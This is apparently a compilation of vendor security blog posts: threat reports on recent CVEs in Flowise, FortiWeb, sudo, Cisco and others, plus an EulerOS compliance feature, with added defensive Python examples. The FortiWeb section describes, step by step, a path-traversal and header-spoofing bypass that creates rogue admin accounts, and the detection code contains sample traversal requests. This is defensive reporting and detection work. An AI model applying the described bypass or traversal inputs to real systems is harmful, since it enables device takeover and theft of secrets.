  • Detection tests for all Zoho vulnerabilities listed in CISA KEV including CVE-2022-47966 and CVE-2021-40539 used in ransomware attacks [T1486]
  • Detection tests for >70% of CVEs affecting Zohocorp products from 2021 onward

Flowise Server Gives Attackers RCE and Access to Secrets

CVE-2025-61913 (CVSS 9.9) is a path traversal flaw [CWE-22] in Flowise that lets low-privileged, authenticated attackers read and write arbitrary files, potentially leading to RCE. Flowise is a drag & drop user interface and backend server for building customized large language model (LLM) applications.

CVE-2025-61913 stems from improper input validation of the file_path parameter in WriteFileTool and ReadFileTool. The flaw enables access to sensitive files such as /root/.flowise/encryption.key and /root/.flowise/database.sqlite in Docker, or /etc/passwd, /etc/shadow, and /root/.ssh/id_rsa in non-Docker setups. The vendor itself has published a full PoC exploit, and at least one other PoC exploit exists [1]. However, in-the-wild exploitation has not been confirmed.
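
The defensive counterpart to the flaw described above is a containment check on caller-supplied file paths. The following is an added example, not Flowise's code: unsafe_resolve mirrors the flawed pattern (joining a file_path under a working directory with no containment check), and safe_resolve refuses any result that escapes the allowed base directory, whether via ../ segments, an absolute path, or a symlink. The directory tree it operates on is constructed in a temporary directory so the example runs offline.

```python
"""Path-containment check of the kind missing in CVE-2025-61913 (added example)."""
import os
import tempfile


def unsafe_resolve(base_dir, file_path):
    """Flawed pattern: os.path.join discards base_dir when file_path is absolute,
    and '..' segments are never checked, so any readable file on the host is reachable."""
    return os.path.join(base_dir, file_path)


def safe_resolve(base_dir, file_path):
    """Resolve file_path relative to base_dir and refuse anything outside it."""
    base = os.path.realpath(base_dir)
    if os.path.isabs(file_path):
        raise ValueError("absolute paths are not allowed")
    # realpath resolves '..' and symlinks, so the containment test sees the real target
    candidate = os.path.realpath(os.path.join(base, file_path))
    # commonpath (not startswith) avoids prefix tricks such as /work vs /work2
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("path escapes the allowed directory")
    return candidate


def demo():
    """Exercise both resolvers on a constructed tree:
    <tmp>/encryption.key (outside), <tmp>/work/notes.txt and <tmp>/work/link -> ../encryption.key."""
    root = tempfile.mkdtemp()
    work = os.path.join(root, "work")
    os.mkdir(work)
    secret = os.path.join(root, "encryption.key")  # constructed stand-in for a secret outside the work dir
    with open(secret, "w") as f:
        f.write("constructed-secret")
    with open(os.path.join(work, "notes.txt"), "w") as f:
        f.write("ok")
    os.symlink(secret, os.path.join(work, "link"))

    out = {}
    # The flawed resolver happily reads the file outside the working directory.
    with open(unsafe_resolve(work, "../encryption.key")) as f:
        out["unsafe_reads_secret"] = f.read() == "constructed-secret"
    # The hardened resolver still serves legitimate files inside the directory...
    out["safe_allows_inside"] = safe_resolve(work, "notes.txt") == os.path.realpath(
        os.path.join(work, "notes.txt"))
    # ...and rejects the three escape routes.
    for name, path in [("dotdot", "../encryption.key"), ("absolute", secret), ("symlink", "link")]:
        try:
            safe_resolve(work, path)
            out["safe_blocks_" + name] = False
        except ValueError:
            out["safe_blocks_" + name] = True
    return out


if __name__ == "__main__":
    for check, ok in demo().items():
        print(check, ok)
```

The symlink case is the one most often forgotten: a lexical check on the string "link" passes, but the resolved target lies outside the directory, which is why the check runs after realpath.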

Several other new high-risk CVEs also impact Flowise Server:

Germany’s BSI has issued WID-SEC alerts for all CVEs described above [2][3][4][5]. The OPENVAS ENTERPRISE FEED includes two remote version detection checks which address all aforementioned CVEs affecting Flowise [6][7][8]. Users should update to version 3.0.8 or later and disable ALLOW_BUILTIN_DEP during installation. See the vendor’s official advisory for more information.

CVE-2025-37729: Critical RCE Vulnerability in Elastic Cloud Enterprise

CVE-2025-37729 (CVSS 9.1) affecting Elastic Cloud Enterprise (ECE) allows RCE to authenticated attackers with admin privileges. Exploitation could allow exfiltration of sensitive data due to improper handling of Jinjava template expressions. The vulnerability poses a significant insider threat, particularly in hybrid and multi-cloud environments where ECE is deployed. Spain’s INCIBE CERT has issued a security alert. Greenbone’s OPENVAS ENTERPRISE FEED includes a remote banner check to identify vulnerable instances. According to the vendor’s official advisory, versions 2.5.0 through 3.8.1 and 4.0.0 through 4.0.1 are affected.

Summary

The October 2025 Threat Report only scratches the surface of new software flaws emerging in the past month—and OPENVAS SECURITY INTELLIGENCE’s ability to detect them. October 2025 saw 4,100 new CVEs and novel cyber attack campaigns leveraging both fresh vulnerabilities and already known ones. This past month, high-impact flaws drove ransomware, data-theft, and operational downtime leading to attempts at corporate extortion and lost revenue. Greenbone’s OPENVAS BASIC free trial plus the OPENVAS ENTERPRISE FEED include detection modules for many emerging and legacy CVEs, helping security teams find, triage, and fix vulnerable IT assets.

Greenbone is excited to announce new compliance policies for Huawei’s EulerOS and openEuler. These compliance policies are the result of close collaboration with Huawei to provide OPENVAS SCAN users with authenticated checks for over 200 key security controls. By thoroughly vetting security settings, defenders gain a high degree of security assurance and visibility into the security posture of their EulerOS infrastructure.

Out of the box, Operating Systems (OS) are configured for ease of use and flexibility. By default, operating systems are set up to handle almost any task without post-install adjustment. Many unnecessary kernel modules and services are enabled, and security settings are relaxed. For maximum security, organizations need to harden the default post-installation settings to keep critical data and operations secure. Compliance testing turns configuration guidance into verifiable controls so teams can audit security at scale. By verifying hardened security configurations, defenders gain high security assurances that their IT assets are resilient against cyber attack.

OPENVAS SCAN allows IT security teams to automate policy‑driven audits across their IT infrastructure. Our platform already includes a library of compliance profiles for CIS controls in critical cybersecurity areas such as Apache, IIS, NGINX, MongoDB, Oracle, PostgreSQL, Windows and Linux [1][2][3][4] and policies based on national guidance for encryption standards.

Now, we’re expanding our compliance auditing and reporting capabilities with new policy profiles for Huawei’s EulerOS family. These new offerings bring policy checks right into OPENVAS SCAN’s vulnerability management workflow. These security hardening controls apply to EulerOS, OpenEuler, HCE, and EulerOS Virtualization OSs. Once the policy scans have been executed in OPENVAS SCAN, the results can be viewed as a specialized audit report.

Read on to find out more about how these new compliance profiles help IT security teams harden their security posture against cyber attack.

OPENVAS SCAN Now Includes Compliance Profiles for Huawei EulerOS

Greenbone’s new compliance scans for Huawei EulerOS follow our existing policy deployment model. OPENVAS SCAN’s compliance policies are specialized scan configurations composed of targeted Vulnerability Tests (VTs) that evaluate whether hosts meet defined security requirements. The new compliance policies for EulerOS are distributed to OPENVAS SCAN instances via the OPENVAS ENTERPRISE FEED and COMMUNITY FEED.

The new compliance profile curates families of authenticated security checks specially tailored to EulerOS environments. Authenticated auditing ensures that accurate evidence is collected from each scanned endpoint, providing the highest visibility for security attestation. OPENVAS SCAN also offers customized reporting formats, including an executive compliance report suited for management oversight.

To execute an audit, users can configure remote access for authenticated scans, select a policy, run the policy scan task, and view an evidence‑rich audit report that shows which controls passed, failed, or require further manual investigation. Policies are managed in OPENVAS SCAN’s Compliance Policies area and executed as vulnerability scans with the same level of control as other scan configurations: alerting, reporting, and scheduling to verify continuous compliance.

What Do the New Huawei EulerOS Compliance Policies Cover?

The goal of the new Huawei EulerOS profile is simple: reduce attack surface by verifying secure settings on every host. The policy scan aggregates over 200 distinct security checks across Linux networking, services and local configuration. The policy tests resemble the CIS Benchmarks while aligning with Huawei’s platform-specific requirements. The new EulerOS compliance policies can also be adjusted to support each organization’s internal policy needs.

The new EulerOS compliance policies include:

  • Service Hardening: Ensures unnecessary or insecure network services (e.g., DNS, NFS, RPC, SNMP, HTTP, Avahi) are disabled or not installed to reduce the system’s attack surface.
  • System Configuration and Kernel Security: Validates secure kernel parameters, sysctl settings, ICMP behavior, address space layout randomization (ASLR), and protection mechanisms like dmesg_restrict.
  • Authentication and Access Control: Enforces strong password policies, account lockout rules, sudo configurations, and user access restrictions to prevent unauthorized access.
  • File and Directory Permissions: Checks critical system files (e.g., /etc/passwd, /etc/shadow, SSH keys) and directories for proper ownership and secure permissions.
  • Password Policy Enforcement: Checks for password complexity, minimum length, expiration period, history count, retry limits, and lockout mechanisms to ensure strong authentication hygiene.
  • User Account and Privilege Management: Reviews active user accounts for unused, duplicate, or privileged users; ensures direct root login is disabled and only necessary users have shell access.
  • Boot and Initialization Security: Validates GRUB configurations, bootloader protections, secure boot settings, and kernel module restrictions.
  • Firewall and Network Traffic Control: Ensures proper iptables/nftables/firewalld configurations for INPUT/OUTPUT policies and default zones to limit unauthorized network communication.
  • Package and Software Management: Checks for secure package management practices, disallows installation of unnecessary or insecure software, and confirms that package repositories are configured correctly.
  • CVE Discovery and Vulnerability Detection: Identifies known vulnerabilities (CVEs) present on the system by checking installed packages against vulnerability feeds. This helps prioritize remediation of exploitable software flaws based on real-world threat data.
  • Logging and Auditing: Verifies audit rules for privileged commands, tracks access to sensitive files, configures rsyslog for remote logging, and ensures audit logs are properly stored and managed.
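
To make concrete what an authenticated check in these families evaluates, here is an added example (not Greenbone's VT code) that audits a handful of the controls listed above: kernel sysctl settings such as ASLR and dmesg_restrict, ownership and permissions of sensitive files, and whether direct root login over SSH is disabled. It works on a constructed snapshot (a sysctl dump, stat-style file records and an sshd_config excerpt) rather than a live host, so it runs offline; the expected values are common hardening baselines and are assumptions of this example, not Huawei's published baseline.

```python
"""Minimal hardening audit over a constructed configuration snapshot (added example)."""

# Constructed stand-in for `sysctl -a` output collected from an audited host.
SYSCTL_DUMP = """\
kernel.randomize_va_space = 2
kernel.dmesg_restrict = 0
net.ipv4.icmp_echo_ignore_broadcasts = 1
net.ipv4.conf.all.accept_redirects = 1
"""

# Constructed `stat -c '%a %U %G'`-style records: path -> (octal mode, owner, group).
FILE_STAT = {
    "/etc/passwd": ("644", "root", "root"),
    "/etc/shadow": ("640", "root", "shadow"),
    "/root/.ssh/authorized_keys": ("644", "root", "root"),
}

# Constructed /etc/ssh/sshd_config excerpt.
SSHD_CONFIG = """\
# comment line
Port 22
PermitRootLogin yes
PasswordAuthentication no
"""

# Expected kernel parameters (assumed baseline values).
EXPECTED_SYSCTL = {
    "kernel.randomize_va_space": "2",            # full ASLR
    "kernel.dmesg_restrict": "1",                # kernel log readable only by privileged users
    "net.ipv4.icmp_echo_ignore_broadcasts": "1",  # ignore broadcast pings (smurf mitigation)
    "net.ipv4.conf.all.accept_redirects": "0",   # do not accept ICMP redirects
}

# path -> (most permissive acceptable mode, required owner, acceptable groups)
EXPECTED_FILES = {
    "/etc/passwd": (0o644, "root", {"root"}),
    "/etc/shadow": (0o640, "root", {"root", "shadow"}),
    "/root/.ssh/authorized_keys": (0o600, "root", {"root"}),
}


def parse_sysctl(dump):
    """Parse `key = value` lines into a dict."""
    values = {}
    for line in dump.splitlines():
        if "=" in line:
            key, _, value = line.partition("=")
            values[key.strip()] = value.strip()
    return values


def check_sysctl(dump):
    """True for each expected parameter whose live value matches."""
    actual = parse_sysctl(dump)
    return {key: actual.get(key) == want for key, want in EXPECTED_SYSCTL.items()}


def mode_at_most(actual, maximum):
    """True if `actual` grants no permission bit beyond `maximum`."""
    return actual & ~maximum == 0


def check_files(stats):
    """True for each sensitive file with acceptable mode, owner and group."""
    results = {}
    for path, (max_mode, owner, groups) in EXPECTED_FILES.items():
        record = stats.get(path)
        if record is None:
            results[path] = False  # missing evidence is a failure, not a pass
            continue
        mode, usr, grp = record
        results[path] = mode_at_most(int(mode, 8), max_mode) and usr == owner and grp in groups
    return results


def sshd_option(config, name):
    """Value of the first effective (non-comment) directive, as sshd would use it."""
    for line in config.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) == 2 and parts[0].lower() == name.lower():
            return parts[1]
    return None


def check_root_login(config):
    return sshd_option(config, "PermitRootLogin") == "no"


def audit(sysctl_dump=SYSCTL_DUMP, file_stats=FILE_STAT, sshd_config=SSHD_CONFIG):
    """Flat {control: passed} mapping across all three families."""
    results = {}
    results.update({"sysctl:" + k: v for k, v in check_sysctl(sysctl_dump).items()})
    results.update({"file:" + k: v for k, v in check_files(file_stats).items()})
    results["ssh:PermitRootLogin"] = check_root_login(sshd_config)
    return results


if __name__ == "__main__":
    for control, ok in audit().items():
        print("PASS" if ok else "FAIL", control)
```

On the constructed snapshot, ASLR, the ICMP broadcast setting and the /etc/passwd and /etc/shadow permissions pass, while dmesg_restrict, ICMP redirects, the group-readable authorized_keys file and PermitRootLogin fail, which is the kind of per-control evidence the audit report presents.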

These security checks are implemented as Vulnerability Tests (VTs), grouped into families, and referenced from the EulerOS policy object. OPENVAS SCAN ships with many other platform‑specific VT families—including Huawei EulerOS Local Security Checks—which are enabled inside of the new policies to collect host‑level evidence of CVE exposure in addition to configuration hardening.

Which Huawei EulerOS Distributions are Covered?

Greenbone’s new compliance profiles are designed for the EulerOS ecosystem including distributions for enterprise and cloud deployments. Delivery is simple: the new Huawei EulerOS compliance profiles are provided via OPENVAS COMMUNITY FEED for Greenbone’s OPENVAS SCAN product. Users receive them with routine feed updates similar to other default policies. This ensures your policy content stays up to date without additional maintenance.

Here is a description of each EulerOS distribution covered in Greenbone’s new compliance profiles, along with a brief description of the OS-specific security coverage.

EulerOS (Traditional/Enterprise)

Coverage focuses on EulerOS 2.0 service packs published by Huawei. OPENVAS SCAN maps each compliance test to Huawei’s official EulerOS security advisories portal, the EulerOS Security Configuration Baseline, and EulerOS lifecycle information. This includes service packs SP9 and newer.

EulerOS Virtual (VM Editions)

For data centers that rely on EulerOS Virtual for x86_64 and ARM64 architecture, our new compliance profiles recognize EulerOS Virtual versions—including releases 2.9.x, 2.10.x, 2.11.x, 2.12.x, 2.13.x. They also include checks for virtualization‑specific packages and services accordingly (for example, KVM/QEMU components and their hardening/patch levels).

openEuler (Community)

For organizations that standardize on openEuler LTS, Greenbone consumes the CSAF‑formatted advisories published by the openEuler project and aligns compliance checks using OS version awareness. The openEuler lifecycle and downloads page document the available LTS releases and service packs. The compliance profiles support auditing versions 20.03, 22.03, 24.03 based on openEuler Security Configuration Baseline.

Huawei Cloud EulerOS (HCE)

For Huawei Cloud EulerOS (HCE) 2.0 and HCE 3.0 cloud deployments, our new compliance profiles leverage publicly available advisories to validate HCE package baselines and configuration hardening specific to cloud images and managed repositories—recognizing differences such as package managers and repository layout between them.

Summary

Greenbone’s new compliance profiles for EulerOS distributions extend OPENVAS SCAN’s capabilities with policy‑driven audits. The policies can be used to attest the hardened security posture of EulerOS, EulerOS Virtual, openEuler and HCE. Delivered through the OPENVAS COMMUNITY FEED, the audits execute authenticated checks to verify secure baselines for a wide scope of attack surface. The profiles are also complemented with detailed technical and executive reporting for stakeholders. These new tools enhance OPENVAS SCAN as a reliable way to harden Huawei-based Linux fleets at enterprise scale.

Discussion of a new security issue affecting Fortinet’s FortiWeb began circulating online in early October 2025, when cyber deception firm Defused reported capturing a working exploit via honeypot. FortiWeb is Fortinet’s web application firewall (WAF) platform, designed to shield web applications from malicious activity. For over one month, Defused’s revelation mostly lurked in the shadows; no CVE assignment, no acknowledgment from Fortinet. Security researchers recently noted that Fortinet seems to have silently patched the flaw without notifying users beforehand.

The issue finally hit the mainstream on November 13th, when watchTowr Labs posted a full proof-of-concept (PoC) exploit. One day later, the vulnerability was assigned an ID: CVE-2025-64446 (CVSS 9.8, EPSS 97th pctl) is now officially recognized as an actively exploited, critical severity issue in Fortinet FortiWeb. The flaw allows attackers to create rogue admin accounts and execute administrative actions.

Fortinet officially classifies CVE-2025-64446 as a Relative Path Traversal issue [CWE-23]. However, it should also be considered an Authentication Bypass Using an Alternate Path flaw [CWE-288], since URL manipulation allows attackers to access a legacy Common Gateway Interface (CGI) processor, which does not implement proper authentication. Users should consult Fortinet’s official advisory, conduct an immediate assessment to determine their risk, and consider emergency mitigation for this flaw.

A free trial of Greenbone’s OPENVAS BASIC is available for defenders to scan their enterprise IT infrastructure for emerging threats such as CVE-2025-64446 in Fortinet’s FortiWeb appliances.

How the Exploit against CVE-2025-64446 Works

The exploit chain for CVE-2025-64446 combines two core design flaws in FortiWeb:

  • A Relative Path Traversal vulnerability [CWE-23] allows unprotected URL routing between the management interface’s REST API and its CGI processor. This incorrect routing serves as an alternative path to bypass authentication.
  • An Authentication Bypass Using an Alternate Path flaw [CWE-288] in the CGI processor does not perform proper authentication for data provided via a connecting client’s CGIINFO HTTP header.

watchTowr’s Python-based PoC demonstrates how attackers can circumvent FortiWeb’s intended API to abuse the legacy CGI processor to create unauthorized admin accounts on the device. Here is how the exploit works:

  1. Attackers can communicate with FortiWeb management port over HTTPS (port 443) with certificate validation disabled to avoid hang-ups with self-signed, outdated, or otherwise invalid certificates.
  2. Unpatched FortiWeb appliances do not properly sanitize the URI before applying authorization rules. Unauthenticated users can achieve path traversal by starting their request URL with https://api/v2.0/… while also traversing via ../../../../../ to cgi-bin/fwbcgi.
  3. Source code analysis revealed that FortiWeb’s legacy CGI backend includes a function named cgi_auth() that blindly trusts any authorization claims provided in the CGIINFO header if the username matches an existing user, including the built-in admin user. This means an unauthenticated attacker can spoof the admin user to gain elevated permissions.
  4. FortiWeb’s CGI processor then processes the rest of the request body with full administrative permissions.
  5. The attacker can submit a malicious JSON object that instructs the system to create a new administrator account with an arbitrary, attacker-controlled username and password to take full control of the device.
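
From a detection standpoint, the chain above leaves two artifacts in management-interface traffic: a request path that starts under the REST API but normalizes into the legacy CGI processor, and a client-supplied CGIINFO header. The following is an added example, not watchTowr's PoC or Greenbone's detection test: it runs that logic over constructed request records (method, path, headers), decoding percent-encoding and collapsing ../ segments the way a router would before dispatch. The record format is an assumption of the example; real FortiWeb logs must be mapped into it first.

```python
"""Flag requests matching the CVE-2025-64446 bypass pattern (added detection example)."""
import posixpath
from urllib.parse import unquote

CGI_PROCESSOR = "/cgi-bin/fwbcgi"   # legacy CGI handler named in the write-up above
CLAIM_HEADER = "cgiinfo"            # header the CGI backend trusted, per the write-up

# Constructed request records standing in for a management-interface access log.
SAMPLE_REQUESTS = [
    {"method": "GET", "path": "/api/v2.0/system/status", "headers": {"Cookie": "session=constructed"}},
    {"method": "POST", "path": "/api/v2.0/../../../../../cgi-bin/fwbcgi",
     "headers": {"CGIINFO": "<constructed-claim>"}},
    {"method": "POST", "path": "/api/v2.0/%2e%2e/%2e%2e/cgi-bin/fwbcgi", "headers": {}},
    {"method": "GET", "path": "/cgi-bin/fwbcgi", "headers": {}},
]


def decode(raw_path):
    """Strip the query string and percent-decode twice to catch double encoding."""
    path = raw_path.split("?", 1)[0]
    for _ in range(2):
        path = unquote(path)
    return path


def normalize_path(raw_path):
    """Collapse '.' and '..' segments; '..' above the root is dropped, as a router would."""
    path = decode(raw_path)
    if not path.startswith("/"):
        path = "/" + path
    return posixpath.normpath(path)


def classify(request):
    """Return the reasons a request is suspicious; an empty list means nothing matched."""
    reasons = []
    decoded = decode(request["path"])
    normalized = normalize_path(request["path"])
    headers = {k.lower(): v for k, v in request.get("headers", {}).items()}

    # A path that only reaches the CGI processor after traversal is the routing artifact.
    if normalized.endswith(CGI_PROCESSOR) and ".." in decoded.split("/"):
        reasons.append("traversal-into-cgi")
    # Authorization claims are never legitimately supplied by a client in this header.
    if CLAIM_HEADER in headers:
        reasons.append("client-supplied-cgiinfo")
    return reasons


def flagged(requests):
    """Indices of records with at least one finding."""
    return [i for i, record in enumerate(requests) if classify(record)]


if __name__ == "__main__":
    for i, record in enumerate(SAMPLE_REQUESTS):
        print(i, record["method"], record["path"], classify(record) or "clean")
```

The direct GET to the CGI path without traversal is deliberately not flagged: the rule targets the bypass pattern rather than all CGI traffic, which keeps it usable as a high-confidence alert while the vendor's mitigation (restricting management access) is applied.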

How to Mitigate the Emerging Fortinet Vulnerability

FortiWeb users should consult Fortinet’s advisory, conduct an immediate assessment to determine their risk, and consider emergency mitigation for this flaw. The vendor also officially recommends disabling HTTP and HTTPS for internet-facing interfaces until an upgrade can be performed. If a FortiWeb HTTP/HTTPS Management interface is only accessible from internal network endpoints, the risk is reduced.

Organizations running unpatched versions of FortiWeb should consider this a critical priority issue. The following versions of FortiWeb are affected:

  • FortiWeb 8.0.0 through 8.0.1
  • FortiWeb 7.6.0 through 7.6.4
  • FortiWeb 7.4.0 through 7.4.9
  • FortiWeb 7.2.0 through 7.2.11
  • FortiWeb 7.0.0 through 7.0.11
  • FortiWeb 6.4 through 6.4.3 (disclosed by watchTowr Labs [1])
  • FortiWeb 6.3 through 6.3.23 (disclosed by watchTowr Labs)

It’s important to note that Fortinet’s list of affected products is less comprehensive than the one provided by third-party security researchers. The EU’s Cyber Resilience Act (CRA) comes into effect in late 2026, bringing a new measure of legal accountability to software vendors that issue untimely or inaccurate security information to their users. The CRA will require software vendors to report known vulnerabilities and known exploits to ENISA within 24 hours.

Greenbone’s OPENVAS ENTERPRISE FEED Has Got You Covered

Greenbone’s vulnerability test development team assessed this emerging FortiWeb flaw before it was published as a CVE. A version check [1] and active check [2] are now available in the OPENVAS ENTERPRISE FEED. These detection tests include both version-based checks and active checks that interact with appliances over HTTP to detect vulnerability to the flaw. This dual-layer approach ensures that organizations can reliably identify vulnerable FortiWeb instances.

As new details emerge, Greenbone will refine and expand coverage to ensure that customers can identify affected instances. A free trial of Greenbone’s OPENVAS BASIC is available for defenders to scan their enterprise IT infrastructure for emerging threats such as CVE-2025-64446 in Fortinet’s FortiWeb appliances.

In total, just over 4,500 CVEs were published in September, exposing defenders to new risk. For operational resilience, organizations need to scan their IT infrastructure to identify where hidden risk could impact their operations. A free trial of Greenbone’s OPENVAS BASIC allows defenders to scan their enterprise IT infrastructure to stay on top of emerging threats. This free trial includes access to Greenbone’s OPENVAS ENTERPRISE FEED, an industry-leading coverage for CVEs and other IT security vulnerabilities.

So far in September, our blog has covered three emerging cyber security events: SessionReaper, an unauthenticated RCE flaw in Adobe Commerce and Magento; a CVSS 10 flaw exposed in Fortra GoAnywhere MFT; and an ArcaneDoor espionage campaign actively exploiting a new vulnerability in Cisco ASA and FTD. In this edition of the monthly threat report, we will cover other high-risk threats from September 2025.

Emerging Threats to Linux Systems

Linux OS is the backbone of global IT infrastructure. As attackers increasingly target Linux environments, vulnerability scanning is essential for operational resilience and service continuity. Here are the top vulnerabilities to Linux disclosed in September 2025.

High-Severity Sudo Flaw is Now Actively Exploited

In July, the Greenbone Threat Report flagged an emerging threat: CVE-2025-32463 (CVSS 7.8) permits unauthorized privilege escalation [TA0004] to root by tricking the Linux sudo command (all releases ≥ 1.9.14 and before 1.9.17p1) into loading attacker-controlled shared libraries [T1129]. CVE-2025-32463 is now being actively exploited and has been added to CISA’s Known Exploited Vulnerabilities (KEV) catalog. Canada’s Cyber Centre has issued a new CERT advisory, adding to the existing alerts [1][2][3]. Organizations cannot achieve high resilience while waiting for known vulnerabilities to be flagged as actively exploited. Greenbone added detection tests for CVE-2025-32463 to the OPENVAS ENTERPRISE FEED and COMMUNITY FEED immediately in July 2025, giving users advanced detection and the opportunity to patch.
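
Both the sudo statement above (all releases ≥ 1.9.14 and before 1.9.17p1) and the FortiWeb affected-version list earlier on this page (for example "7.6.0 through 7.6.4" and "6.4 through 6.4.3") are version-range statements that a version check has to evaluate exactly, including sudo's "pN" patch-level suffix and short versions such as "6.4". The following added example (not Greenbone's VT code) parses such strings into comparable tuples and classifies a version for both products; the `sudo --version` banner it parses is constructed.

```python
"""Version-range matching for affected-version statements (added example)."""
import re

# Numeric dotted version with an optional sudo-style patch suffix, e.g. 1.9.17p1.
_VERSION_RE = re.compile(r"^(\d+(?:\.\d+)*)(?:p(\d+))?$")

# Inclusive ranges from the FortiWeb list on this page.
FORTIWEB_AFFECTED = [
    ("8.0.0", "8.0.1"), ("7.6.0", "7.6.4"), ("7.4.0", "7.4.9"),
    ("7.2.0", "7.2.11"), ("7.0.0", "7.0.11"), ("6.4", "6.4.3"), ("6.3", "6.3.23"),
]


def parse_version(text):
    """'7.6.4' -> (7, 6, 4, 0, 0); '6.4' -> (6, 4, 0, 0, 0); '1.9.17p1' -> (1, 9, 17, 0, 1).
    Up to four numeric components are padded with zeros so tuples compare
    element-wise; the patch suffix is the last element, so 1.9.17 < 1.9.17p1."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError("unrecognized version: %r" % text)
    parts = [int(p) for p in m.group(1).split(".")]
    if len(parts) > 4:
        raise ValueError("too many components: %r" % text)
    parts += [0] * (4 - len(parts))
    patch = int(m.group(2)) if m.group(2) else 0
    return tuple(parts) + (patch,)


def in_inclusive_ranges(version, ranges):
    v = parse_version(version)
    return any(parse_version(lo) <= v <= parse_version(hi) for lo, hi in ranges)


def fortiweb_affected(version):
    """True if the version falls inside one of the listed inclusive ranges."""
    return in_inclusive_ranges(version, FORTIWEB_AFFECTED)


def sudo_affected(version):
    """True for releases >= 1.9.14 and < 1.9.17p1, the range stated for CVE-2025-32463."""
    v = parse_version(version)
    return parse_version("1.9.14") <= v < parse_version("1.9.17p1")


def sudo_version_from_banner(banner):
    """Pull the version out of `sudo --version` output ('Sudo version 1.9.15p5 ...')."""
    m = re.search(r"Sudo version (\S+)", banner)
    return m.group(1) if m else None


if __name__ == "__main__":
    # Constructed banner, not captured from a real host.
    banner = "Sudo version 1.9.15p5\nSudoers policy plugin version 1.9.15p5\n"
    v = sudo_version_from_banner(banner)
    print("sudo", v, "affected" if sudo_affected(v) else "not affected")
    for fw in ("7.6.4", "7.6.5", "6.4.3"):
        print("FortiWeb", fw, "affected" if fortiweb_affected(fw) else "not affected")
```

The patch suffix is the detail that matters here: treating "1.9.17p1" as "1.9.17" would wrongly classify the fixed release as vulnerable, and treating "6.4" as a plain prefix would miss that 6.4.4 lies above the listed range.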

CVE-2025-38352 POSIX CPU TOCTOU Race in the Linux Kernel

CVE-2025-38352 (CVSS 7.4, EPSS ~70th pctl) is a time-of-check to time-of-use (TOCTOU) flaw [CWE-367] in the Linux kernel’s POSIX CPU timers. CVE-2025-38352 allows denial of service (DoS) [T1499] on affected systems and has been added to CISA’s KEV. While no public proof-of-concept (PoC) exploit is available, security researchers have published a detailed technical analysis.

The German BSI has issued two alerts for CVE-2025-38352: one for the Linux kernel [1] and one for Android [2]. Greenbone’s OPENVAS ENTERPRISE FEED and COMMUNITY FEED include patch-level checks for Linux distributions.

High-Severity Vulnerability in Linux UDisks Daemon

CVE-2025-8067 (CVSS 8.5) is a local, unauthenticated privilege escalation [TA0004] flaw in Red Hat Enterprise Linux’s (RHEL) UDisks daemon. The UDisks daemon is a system service for managing storage devices such as hard drives, SSDs, USB drives, optical media, and partitions. The root cause of CVE-2025-8067 is improper handling of negative integer indexes, which can trigger an out-of-bounds memory read [CWE-125]. Exploitation can result in DoS [T1499], or local privilege escalation [T1068] by mapping a loop device to a privileged local file [1].

There’s no indication of active exploitation, but PoC code has been published [2][3]. Germany’s BSI has issued a security advisory [4]. The OPENVAS ENTERPRISE FEED and COMMUNITY FEED include package patch-level checks for many Linux distributions. Patching is the only viable mitigation.

New ImageMagick CVEs Pose DoS and RCE Risks

CVE-2025-53014 (CVSS 9.8), CVE-2025-53019 (CVSS 7.5), and CVE-2025-53101 (CVSS 9.8) arise from improper processing of image filenames [CWE-66] in the ImageMagick packages for Linux. Exploitation could reportedly lead to DoS [T1499] and arbitrary code execution [T1203] in the case of CVE-2025-53101. Although these three CVEs aren’t known to be actively exploited in the wild, the German BSI has issued a CERT-Bund Advisory [WID-SEC-2025-1537]. The OPENVAS ENTERPRISE FEED and COMMUNITY FEED include detection checks across many Linux distributions.

Multiple High-Risk Security Issues in Cisco Products

CVE-2025-20352 and CVE-2025-20312 (both CVSS 7.7) capped off a tumultuous month for Cisco products. Both CVEs were published on September 24th, 2025. CVE-2025-20352 was discovered by Cisco while fulfilling a customer’s technical support case. The flaw was added to CISA KEV five days later and advisories have been issued by several national CERT agencies [1][2][3][4][5][6][7]. Both CVEs are in the Simple Network Management Protocol (SNMP).

CVE-2025-20352 is due to a stack overflow [CWE-121] in the SNMP subsystem of affected products: IOS/IOS XE (all SNMP versions) and Meraki MS390/Catalyst 9300 running Meraki CS 17 or earlier. Exploitation allows authenticated DoS and potentially root-level RCE, depending on the credentials possessed by the attacker. DoS is possible with an SNMPv1/v2c read-only community string or valid SNMPv3 user credentials. To achieve root-level RCE, administrative (privilege 15) credentials for the device are required.

CVE-2025-20312 allows an authenticated remote attacker to cause a DoS. The flaw is caused by improper error handling that allows the system to enter into an infinite loop when parsing crafted SNMP requests [CWE-835]. Exploitation requires a valid SNMP community string with either read-write or read-only permissions. Affected systems are limited to IOS XE switches with both SNMP enabled and WRED for MPLS EXP configured.

No public exploits are available for either CVE. Users who cannot patch may mitigate the vulnerability by limiting SNMP access to trusted network entities and disabling the vulnerable Object Identifiers (OIDs). Cisco has published advisories for each CVE separately [8][9]. The OPENVAS ENTERPRISE FEED provides both authenticated and remote version detection tests for the actively exploited CVE-2025-20352 [10][11] and a remote version detection check for CVE-2025-20312 [12].

Twice-Patched Flaw in SolarWinds Help Desk Still Vulnerable

CVE-2025-26399 (CVSS 9.8) is an unauthenticated RCE vulnerability in SolarWinds Web Help Desk 12.8.7 and all prior versions. The CVE is a patch bypass for CVE-2024-28988, which itself was a bypass for CVE-2024-28986. The original CVE-2024-28986 was added to CISA’s KEV catalog shortly after its disclosure. While there are no confirmed reports of this latest bypass being exploited in the wild, security experts believe exploitation is likely. The root cause remains the same: flawed deserialization of untrusted data [CWE-502] in the product’s AjaxProxy component.

National CERT advisories have been issued by Canada’s CCCS, CERT-FR, and Spain’s INCIBE-CERT. Greenbone’s OPENVAS ENTERPRISE FEED includes a remote banner version check, allowing security teams to identify affected instances. Given the critical severity and history of exploitation, applying the Web Help Desk 12.8.7 Hotfix 1 patch is strongly recommended.

Sitecore XM, XP, and XC Actively Exploited

CVE-2025-53690 (CVSS 9.0, EPSS ~95th pctl) is a deserialization vulnerability [CWE-502] affecting Sitecore Experience Manager (XM), Experience Platform (XP), Experience Commerce (XC), and some Managed Cloud instances. Unauthenticated attackers can craft malicious __VIEWSTATE payloads to achieve RCE with admin privileges. The vulnerability is under active attack and has been added to CISA’s KEV, joining other exploited Sitecore flaws. At least one Sitecore CVE is known to be leveraged in ransomware attacks.

